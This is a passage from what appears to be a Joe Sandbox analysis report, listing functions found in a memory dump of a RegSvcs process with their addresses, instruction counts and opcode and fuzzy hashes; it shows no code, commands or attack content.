Opcode Fuzzy Hash: 9aa81fd9c076d57c243d53036816d8a456ca0ad297c28f3ccffb996da8fe0836
Instruction Fuzzy Hash: 13A1E370B006169FDB25CF69C990BBAB7B5FF54714F088029EA4DD7282EB34E811CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A64500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e0b6e54f8299d69e4a0ffb42c63e9e445d4069026bc71cd6e113af4aab223f
Instruction ID: 43a90791dad9be6b16ccbd711da1c915d9386d6660f271f11982f2ffba71861d
Opcode Fuzzy Hash: 26e0b6e54f8299d69e4a0ffb42c63e9e445d4069026bc71cd6e113af4aab223f
Instruction Fuzzy Hash: 09A1FD72A04642EFD726DF28C980B6ABBE9FF88704F454528F6899B651D334ED01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A62B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: 5416af305e838a577d85d33c6b3d1c1d86f5156a244e22f4d2c2a2a373448172
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: C2B14B71E0061ADFDF25CFA9C880BADBBB9FF98350F14812AE915A7354D730A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A160E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2001e69d7e720cd4c29caa42803062314d417a02f058128393414709d7571777
Instruction ID: 5141fe17f68586e311d6416a818cea1f10a4afa9728742caafeddee712ea250f
Opcode Fuzzy Hash: 2001e69d7e720cd4c29caa42803062314d417a02f058128393414709d7571777
Instruction Fuzzy Hash: 6191B471D00216AFDB15CFA8D884BBEBFB9AF48710F154169E618EB345D7B4D900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019AE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a7ec473334be0967fb9e62446cb2e8d7eda3fdab0307f5acbd5d5c82957a9e1
Instruction ID: 88924143b7f0db33a29f1e43fe0c59f471ac716fdeec288738a4b7373f72d679
Opcode Fuzzy Hash: 8a7ec473334be0967fb9e62446cb2e8d7eda3fdab0307f5acbd5d5c82957a9e1
Instruction Fuzzy Hash: DC917531A00216DBEB24DB58D480B7DBBE9FF84B18F458469EA4D9B380E734D849C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 019E6ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7965baeb78d869c0a645d9431e6263dacbc81ce4f9ac1938f7214618fb89060
Instruction ID: c62c63bb5047aaeb8f372f1ddae6ef4472338f36f2a352f444ee41b4dcfa7fbf
Opcode Fuzzy Hash: c7965baeb78d869c0a645d9431e6263dacbc81ce4f9ac1938f7214618fb89060
Instruction Fuzzy Hash: C681A471E00616AFDB25CF69C844ABEBBF9FB58700F04852EE559E7640E334E940CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01A5AB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: aee0520ca4f17240e79de1b20103fe933031342433ec43000fb8458dd9a8cfbf
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: E5818072B0420A9FDF59DF99C480AAEBBF2BF84310F198669DD169B345D734E905CB80

Uniqueness

Uniqueness Score: -1.00%

Function 019CE284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8708e64f8d175ddd75883bdba76b6c20f3996f672d3aee3fe7be8b036b179306
Instruction ID: 2d458c4185d4a21eef3fd3f37c7cffdcc2a338d51d3efd39ee060ff054d16e01
Opcode Fuzzy Hash: 8708e64f8d175ddd75883bdba76b6c20f3996f672d3aee3fe7be8b036b179306
Instruction Fuzzy Hash: 28816371900609AFDB26CFA9C880BEEBBF9FF88754F10442DE55AA7250D730AD45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019AC640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5223caa25fa14a05865be321cfc0afc6fc1d88258fe6d320ed5e31c5fbd367ea
Instruction ID: f5a057e99a70aae0f638509d7d7af19f9eefc4ebf0f9098f5d65ba41c79d94f0
Opcode Fuzzy Hash: 5223caa25fa14a05865be321cfc0afc6fc1d88258fe6d320ed5e31c5fbd367ea
Instruction Fuzzy Hash: EC71BF75D04669EBCB25CF58C490BBEBBB4FF48710F54451AE95AAB390D730A805CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01A447A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eeeaf2b83d234c6e405176734bf84f0105fb86d3608965605830f106258c42e1
Instruction ID: fd5073b9def2fcf55718243958b0499f44d760c56cc36b8cd82f00ec36c57161
Opcode Fuzzy Hash: eeeaf2b83d234c6e405176734bf84f0105fb86d3608965605830f106258c42e1
Instruction Fuzzy Hash: 1B7183B4900205EFEB24DF99DA44B9EBBF8FFD8300F14816AE618EB259C7318945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 019A260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 560da52c63384cdf12cf3b02c690b96c6c1bbec94de1d40ea07f50a757c55d6d
Instruction ID: 5ebd6c1d3c10a45370fb57167609dddaf736b496f1775c925a843d2de2cdfd7a
Opcode Fuzzy Hash: 560da52c63384cdf12cf3b02c690b96c6c1bbec94de1d40ea07f50a757c55d6d
Instruction Fuzzy Hash: 3071BE356046429FD311DF2CC480B6ABBE9FF84310F4585AAE899CB752DB34E94ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01A1035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: bb4f44142e56f1f8f3afd5d92fda664807ecea8ee3339f9ceb3b73b599c64847
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: EA716D71E00619EFDB10DFA9CA84ADEBBB9FF88310F144569E505A7250DB30EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A262A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9ed9be441785b080df9fdc270f2ddd6d3b3b21229871bcb8c615f0e2ed5f3f
Instruction ID: 860a1061fc8c8e3bf670b3fb11a73a426b455af785528625ef70ec9258afb05f
Opcode Fuzzy Hash: 3c9ed9be441785b080df9fdc270f2ddd6d3b3b21229871bcb8c615f0e2ed5f3f
Instruction Fuzzy Hash: D071F332201711AFE732CF1CC944F5ABBB6FF84720F158428EA9A8B2A1D774E944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01998AA0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c67e3655df61ca831b36a5c2565a46d87c97f96b6007da59c8afa3260f9c8f4
Instruction ID: 49a84fbaef05dd362b01bca05a22d1b42146f14dcf81c0e07f044f910e5b8531
Opcode Fuzzy Hash: 2c67e3655df61ca831b36a5c2565a46d87c97f96b6007da59c8afa3260f9c8f4
Instruction Fuzzy Hash: 4281BF76A043069FDB28CF9CC484BAEBBB9BF49715F19412DDA08AB285C774DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A68324 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6e8fa13677a5a405fe4beb11ad4f53de1472e96800a879f050fd0912130904
Instruction ID: 7808260dc1d7575628268c1c30e24cfde1a20610cf99e349f88ad76a269c767d
Opcode Fuzzy Hash: 8c6e8fa13677a5a405fe4beb11ad4f53de1472e96800a879f050fd0912130904
Instruction Fuzzy Hash: 9071F971E00209AFDB16DF94C841FEEBBBDFF44750F104169E625A7290E774AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A4A250 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b4eeb7fcb93076d47970035e4dd17e65a00d3806747400436f54765a1fba18
Instruction ID: 7bae197a205e3a2a2cc7f3e41f6ddd94d41ec10654cf60dc6d8a000e1747dc76
Opcode Fuzzy Hash: e5b4eeb7fcb93076d47970035e4dd17e65a00d3806747400436f54765a1fba18
Instruction Fuzzy Hash: B551CE72544712AFD721DE68C844E5FBBF8EBC8750F014929BA46DB151D770ED04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01A38350 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137e533b42974a7a192084bd8ecf68162e66ec5dd0b13269d87e13f583943f2f
Instruction ID: bc0116c71060d2c558f20807755eb48b7a9ca53ceef9ad34639a6823c9747a58
Opcode Fuzzy Hash: 137e533b42974a7a192084bd8ecf68162e66ec5dd0b13269d87e13f583943f2f
Instruction Fuzzy Hash: 3D517E70900705ABD721DF6AC880BAAFBF8BF94710F10471EF19697AA1D7B4A545CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019CE443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49686cdbfde15dfe8e008167f6bd92f03ba4f7c972555cd9c8f3c8883bbd969d
Instruction ID: f10a0e6ca3ad058049e087b978443239074bb7304261ec3a1c5ee15e50b5d757
Opcode Fuzzy Hash: 49686cdbfde15dfe8e008167f6bd92f03ba4f7c972555cd9c8f3c8883bbd969d
Instruction Fuzzy Hash: DF516D71600A05EFCB22EF69C980E6AB7FDFF58B84F40082DE54A97261D734EA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A34180 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be2767eb9b1fdd3b05e5eea03e715d6af156d7682b8846bd912b9936179798a
Instruction ID: 71a53820303b4454e4b144cebf5f1611fdfcfe6ff9f80960b9a4c2116d6ae08c
Opcode Fuzzy Hash: 0be2767eb9b1fdd3b05e5eea03e715d6af156d7682b8846bd912b9936179798a
Instruction Fuzzy Hash: 825176716083029FD754DF69C881A6BBBE5FFC8208F444A2DF599C7250EB30D905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019B45B1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction ID: 8f3a0d77a283001a1cc511f4a5cb37c44f9c687d72083ea5d873766d5a875866
Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction Fuzzy Hash: DF519071E0021EABDF15DF98C5C0BEEBBB9AF49354F044069EA0AAB241D774DD44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A1E9E0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction ID: b4103cd8aa97470c7830f055fc3cd2691384a87044cd1f793941c403649ceb7d
Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction Fuzzy Hash: 2C51B671D0420AEFEF22DF94C984BAEBBB9BF40364F158665DD1667194D7309E40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A58B28 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c298d7d8dd05a4376cbafaec5c106a39795730ee173cf0dae813f023ef765de
Instruction ID: ad954b73c3a4f5f0bd03fcd6efef48de5fb0239503902a4dd43f2c5c22821f36
Opcode Fuzzy Hash: 4c298d7d8dd05a4376cbafaec5c106a39795730ee173cf0dae813f023ef765de
Instruction Fuzzy Hash: 4E41E770709611ABD7A9DB2FC994B7FBBAAEF90220F088219ED55C7381D73CD801C691

Uniqueness

Uniqueness Score: -1.00%

Function 01A1CBF0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1075899f2f2ec48b79d4d8be946afd271d0129d3e3c84cd00b1b0457f4942323
Instruction ID: f9c654c7d883faff7580f91db20f5e86b85ad5b43597bee0eedd0e3567c72458
Opcode Fuzzy Hash: 1075899f2f2ec48b79d4d8be946afd271d0129d3e3c84cd00b1b0457f4942323
Instruction Fuzzy Hash: 3A51AE75D40216DFDB20DFA9C980AAFBBB9FF88328B554529D549A3708E730AD05CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 01A5A9D3 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction ID: 77a5ec3a587405182ab5f37c5dd9f23d1d64226f97921ada52bcff1d306ed9e8
Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction Fuzzy Hash: E941B5717087169FD765CF68C984A6AB7A9FF80214F05872EEE5687640EB30ED18C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 019C01F8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0f3d85eb6369ba76e49fc57a9dd8a311c299ea23d20bb7b71249fe0d5c3ba8
Instruction ID: b36c44b5987367f53e242d262386b2d26ad4fdaa3a290e0d6c130e51647c8c83
Opcode Fuzzy Hash: 4b0f3d85eb6369ba76e49fc57a9dd8a311c299ea23d20bb7b71249fe0d5c3ba8
Instruction Fuzzy Hash: 6141CD39D00219DBDB15DF98C440AEEBBB5BF88B50F18811EF899E7240D7349D01CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 019BEBFC Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f525269ed9980be306211002fd0fe361095f03883ed0b5e7dcbf5c6c514b68
Instruction ID: 9e59f94434d46f9b2aabdb31886a1622e0baf92651be643363c3db30a9488b66
Opcode Fuzzy Hash: 93f525269ed9980be306211002fd0fe361095f03883ed0b5e7dcbf5c6c514b68
Instruction Fuzzy Hash: BA41C2726043029FD725DF28C984AABB7EDFB84314F00482DE65BC3651EB70E8488B91

Uniqueness

Uniqueness Score: -1.00%

Function 019D2750 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction ID: c65ccb1b54caf497e6baa5666fd121400fd3215ae45a1594adeb1e81959b0724
Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction Fuzzy Hash: B7515C79A00215CFDB16CF9CC580AAEF7B2FF84710F2981A9D915A7391D771AE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01996154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e5752660e26fd082d2aae2d19c0113306565f6b2f6c32f766a24a7170aa61e
Instruction ID: f14406121b0c5158b7e91e9e592579266807998ff6904a4f8f5e2f18a1cfb24f
Opcode Fuzzy Hash: d3e5752660e26fd082d2aae2d19c0113306565f6b2f6c32f766a24a7170aa61e
Instruction Fuzzy Hash: F351E6709002069BEF259B2CCC00BACBBB9FF55314F1482E9D51DA76D1E7349981CF80

Uniqueness

Uniqueness Score: -1.00%

Function 01990BCD Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d1aee440f9484be5afd0913f7c4ee2334511085fc9a53939294994cc8f532c0
Instruction ID: 86e645da539484dd1d0e7447e2976c2db05c42231dd66588426189590f3ed897
Opcode Fuzzy Hash: 1d1aee440f9484be5afd0913f7c4ee2334511085fc9a53939294994cc8f532c0
Instruction Fuzzy Hash: 1C419E31E002699BDF22DF6CC944BEA77BCAF95740F4540A5E90CAB241E7349E84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A5866E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: 78c7bd09d5d61ce73e816559373519aaac2015f258d76997361b3384744ff1fb
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: 6541D675B04205EBDB55DF9ACD84ABFBBBAAF88250F144069ED04A7341D778DD04C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01990887 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8747be6b33cb0e5878af06b48fd2e165fe816e850f9bc29b07618d01cb3216
Instruction ID: 4c2dea2971624f031ac1d83a54ea267439affbb4e22e8319a36facacca4f7d62
Opcode Fuzzy Hash: 0d8747be6b33cb0e5878af06b48fd2e165fe816e850f9bc29b07618d01cb3216
Instruction Fuzzy Hash: DE41A1716007029FEB25CF2DC484A26B7FDFF89314B188A6DE56E86A50E731E855CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019BA470 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948a5f5875f14a6621bff05225aae305962bedcc657c01bf15176ad05934e4f9
Instruction ID: 6c17801fdfae62837969a7b93efca09e50567802e0e6b24c82bc66b209b9ed13
Opcode Fuzzy Hash: 948a5f5875f14a6621bff05225aae305962bedcc657c01bf15176ad05934e4f9
Instruction Fuzzy Hash: 8B412232A00206DFDB21DF68CA84BEE7BB5FF48B21F044559D519AB291DB74DE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01998BF0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76a7291ba85640fcfb0abbfb41c2979e506a584853354077d2c728d3230b895c
Instruction ID: b7500b77ae1086ae8ce9c6765375acca4be978e2ee8bdb4acac1dacccf094fea
Opcode Fuzzy Hash: 76a7291ba85640fcfb0abbfb41c2979e506a584853354077d2c728d3230b895c
Instruction Fuzzy Hash: 2F412276A0020ADBDB28DF5CC880B6EBBB5FB99B00F15802ED9099B255D375DC42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01988918 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3673a3ddf3d9261b62052949c6a4ff45708af3ca72e9779bc778fe9ac89494
Instruction ID: d3a9bc02035f4ec48e29a2c40a93be184b4c737f6b86509a196cb34a558eaced
Opcode Fuzzy Hash: 7c3673a3ddf3d9261b62052949c6a4ff45708af3ca72e9779bc778fe9ac89494
Instruction Fuzzy Hash: EE416F315083169FD312EF65C980E6BB7E9EF84B54F40092AF989D7650E732DE058BA3

Uniqueness

Uniqueness Score: -1.00%

Function 0198A020 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction ID: b7d0eb10b889716de068ab174b0ea63545e819265123192197c04162bef722e9
Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction Fuzzy Hash: FA41CE31A00211DBDB12FE5CC088BBABBF5EB81312F15842BEA4E8B240D6378D41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 019909AD Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610c64aabc8143fd2621ac4aec3c581752443353da7c75292eb25d47622e7f4d
Instruction ID: f755e9622a15d67f269af7511d57f577ba331b56570e3ef1aadca93750c7764e
Opcode Fuzzy Hash: 610c64aabc8143fd2621ac4aec3c581752443353da7c75292eb25d47622e7f4d
Instruction Fuzzy Hash: 1B419A71A01601EFDB21DF1CC844B26BBF9FF94315F248A2AE45D8B251E735E942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019C0710 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

